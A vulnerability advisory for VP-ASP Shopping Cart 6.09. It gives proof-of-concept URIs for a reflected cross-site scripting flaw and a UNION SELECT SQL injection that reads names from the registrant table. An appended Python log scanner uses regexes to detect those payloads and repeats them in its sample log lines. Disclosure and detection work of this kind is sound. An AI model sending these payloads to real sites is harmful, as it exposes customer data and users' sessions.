

Title VP-ASP Shopping Cart Multiple Input Validation Vulnerabilities
Published 2007-01-11-12:00AM
Updated 2007-01-12-05:50PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  ajann is credited with the discovery of these vulnerabilities.
Vulnerable  VPASP Shopping Cart 6.09
Not Vulnerable  
Code   To exploit a cross-site scripting issue:

An attacker can exploit this issue by enticing an unsuspecting user into following a malicious URI.

The following proof-of-concept URI is available:

http://example.com/[path]/shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E

To exploit an SQL-injection issue:

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://example.com/[path]/shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
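
A log-review check for the two request patterns above, added here as an example and not part of the original advisory or of VP-ASP: it decodes the `msg` and `LoginLastname` parameters (including double percent-encoding) and flags script markup or a UNION SELECT. The log field order, the `/shop/` path and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Script -> (parameter, rule) pairs taken from the advisory's two URIs.
WATCHED = {
    "shopcustadmin.asp": ("msg", "xss"),
    "shopgiftregsearch.asp": ("loginlastname", "sqli"),
}
RULES = {
    "xss": re.compile(r"<\s*/?\s*(script|iframe|img|svg)\b|javascript:", re.I),
    # UNION SELECT, or quote + boolean/comment token; bare apostrophes (O'Brien) pass.
    "sqli": re.compile(r"\bunion\b\s+(all\s+)?select\b|'\s*(or|and)\b|'\s*--", re.I),
}

def decode(value, rounds=3):
    """Undo repeated percent-encoding (bounded) so %253C is seen as '<'."""
    for _ in range(rounds):
        nxt = unquote_plus(value)
        if nxt == value:
            break
        value = nxt
    return value

def scan(lines):
    """Return (line_no, script, kind) for each suspicious request."""
    hits = []
    for no, line in enumerate(lines, 1):
        fields = line.split()
        if line.startswith("#") or len(fields) < 5:
            continue
        script = fields[3].lower().rsplit("/", 1)[-1]
        if script not in WATCHED:
            continue
        param, kind = WATCHED[script]
        for name, value in parse_qsl(fields[4], keep_blank_values=True):
            if name.lower() == param and RULES[kind].search(decode(value)):
                hits.append((no, script, kind))
    return hits

# Constructed sample lines: date time method uri-stem uri-query status.
SAMPLE = [
    "2007-01-12 10:00:01 GET /shop/shopcustadmin.asp msg=Profile+updated 200",
    "2007-01-12 10:00:07 GET /shop/shopcustadmin.asp msg=%3Cscript%3Ealert('x');%3C/script%3E 200",
    "2007-01-12 10:01:15 GET /shop/shopgiftregsearch.asp LoginLastname=O'Brien 200",
    "2007-01-12 10:01:40 GET /shop/shopgiftregsearch.asp LoginLastname='%20union%20select%200,lastname,0%20from%20registrant%20where%20'1=1 200",
    "2007-01-12 10:02:02 GET /shop/shopcustadmin.asp msg=%253Cscript%253Ealert(1)%253C/script%253E 200",
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Hits on these two scripts indicate probing; the fix itself is output encoding of `msg` and a parameterized query for `LoginLastname` in the application.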

Copyright 2007, SecurityDot